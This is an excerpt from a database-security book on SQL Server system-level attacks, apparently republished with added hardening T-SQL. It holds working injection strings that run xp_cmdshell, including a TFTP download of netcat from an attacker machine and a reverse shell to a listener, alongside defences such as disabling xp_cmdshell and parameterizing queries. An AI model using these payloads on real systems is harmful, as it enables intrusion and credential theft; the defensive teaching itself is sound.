System-level SQL Server attacks

16 Sep 2005 | SearchSQLServer.com

The following excerpt, courtesy of Wiley Publishing, is from Chapter 22 of the book "The Database Hacker's Handbook: Defending Database Servers" written by David Litchfield, Chris Anley, John Heasman and Bill Grindlay.



System-level attacks

If the vulnerable application is connecting to the database with system administrator privileges, attacks can be launched on the operating system itself. Commands can be executed using xp_cmdshell:

'; exec master..xp_cmdshell 'dir > C:\dir.txt' --

Requesting a DNS lookup of the attacker's machine (the non-routable 192.168.0.1 in this example) verifies that commands are executed; DNS queries on TCP port 53 are often allowed out through corporate firewalls:

'; exec master..xp_cmdshell 'nslookup foobar 192.168.0.1' --

Running a packet sniffer such as Ethereal, a DNS query arrives containing the internal IP address of the database server. If permitted by the SQL Server's firewall the attacker may attempt to gain a remote shell by instructing the server to download the network tool netcat from a TFTP (trivial file transfer protocol) server running on his machine:

'; exec master..xp_cmdshell 'tftp -i 192.168.0.1 GET nc.exe c:\nc.exe' --

A command shell can now be pushed out to the attacker's netcat listener on port 53:

'; exec master..xp_cmdshell 'c:\nc.exe 192.168.0.1 53 -e cmd.exe' --

The usual technique for viewing command-line responses is to insert the information into a temporary table and then retrieve it using the previously detailed approaches, either through error message information or by using time delays. The local Windows usernames on the server can be exported using

'; create table test(num int identity(1,1), data varchar(4096)); insert into test exec master..xp_cmdshell 'cmd /c net user' --

The usernames can then be viewed line by line using

' or 1 in (select data from test where num = 1)--
' or 1 in (select data from test where num = 2)--
' or 1 in (select data from test where num = 3)--
etc...
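As an added example (T-SQL written for this page, not code from the book), the checks and changes that close off the attack just described: the application's login must not be a sysadmin, and xp_cmdshell should be disabled. The names webapp_login and AppDb are assumed placeholders.

```sql
-- Added example (not from the book): audit and remove the two preconditions
-- the attack above relies on. Run as an administrator; 'webapp_login' and
-- 'AppDb' are assumed placeholder names.

-- 1. Which logins hold sysadmin? The application's login must not be here.
SELECT name
FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- 2. Is xp_cmdshell enabled? (value_in_use = 1 means enabled; SQL Server 2005+)
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 3. Disable xp_cmdshell (it is an advanced option, so expose it first).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Give the application a least-privilege login: data access in its own
--    database only, no server-level roles.
CREATE LOGIN webapp_login WITH PASSWORD = 'REPLACE_WITH_STRONG_PASSWORD';
GO
USE AppDb;
GO
CREATE USER webapp_login FOR LOGIN webapp_login;
EXEC sp_addrolemember 'db_datareader', 'webapp_login';
EXEC sp_addrolemember 'db_datawriter', 'webapp_login';
GO

-- 5. Confirm under the application's own identity: this must return 0.
EXECUTE AS LOGIN = 'webapp_login';
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
REVERT;
```

With xp_cmdshell off and the login outside sysadmin, an injection in this application is limited to the data the login can reach and cannot run operating-system commands.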

Alternative Attack Vectors

SQL injection can also occur if an application takes a value such as a session identifier from a user-supplied cookie. Care should be taken that equally stringent input validation is applied to values received from cookies, as is applied to those from form fields and URL query strings.

Web applications can extract information from many different sources, such as the HTTP request headers (Accept, User-Agent, Host, and so on) provided by web browsers when connecting to a server. These are often written to a database in order to generate user statistics, such as the prevalence of certain browsers or operating systems, and could open up a web application to SQL injection if incorrectly handled.

Both filenames and registry keys and their values may be utilized by a web application to form queries, and should also be audited for SQL injection.
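The header-logging case above, as an added example (T-SQL written for this page, not code from the book): the same insert written with string concatenation and then parameterized. Table and procedure names are assumed.

```sql
-- Added example (not from the book): logging the User-Agent header, first
-- with string concatenation (injectable) and then parameterized. Table and
-- procedure names are assumed.
CREATE TABLE dbo.RequestLog (
    id         int IDENTITY(1,1) PRIMARY KEY,
    logged_at  datetime NOT NULL DEFAULT GETDATE(),
    user_agent nvarchar(512) NOT NULL
);
GO

-- Vulnerable: the header value is spliced into the SQL text, so a quote in
-- the User-Agent ends the literal and whatever follows runs as T-SQL.
CREATE PROCEDURE dbo.LogUserAgent_Unsafe @ua nvarchar(512) AS
    EXEC ('INSERT INTO dbo.RequestLog (user_agent) VALUES (''' + @ua + ''')');
GO

-- Safe: the header value is bound as a parameter and can only ever be data.
CREATE PROCEDURE dbo.LogUserAgent @ua nvarchar(512) AS
    INSERT INTO dbo.RequestLog (user_agent) VALUES (@ua);
GO

-- Where dynamic SQL is unavoidable, bind through sp_executesql rather than
-- building the statement text with EXEC().
CREATE PROCEDURE dbo.LogUserAgent_Dynamic @ua nvarchar(512) AS
    DECLARE @sql nvarchar(200);
    SET @sql = N'INSERT INTO dbo.RequestLog (user_agent) VALUES (@p)';
    EXEC sp_executesql @sql, N'@p nvarchar(512)', @p = @ua;
GO

-- Constructed test value: the safe procedures store it verbatim as data.
DECLARE @hostile nvarchar(512);
SET @hostile = N'Mozilla/5.0''; exec master..xp_cmdshell ''dir'' --';
EXEC dbo.LogUserAgent @hostile;
EXEC dbo.LogUserAgent_Dynamic @hostile;
SELECT id, user_agent FROM dbo.RequestLog;
```

The same rule applies to cookie values, filenames and registry data: every value that reaches a query must travel as a bound parameter, never as part of the statement text.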
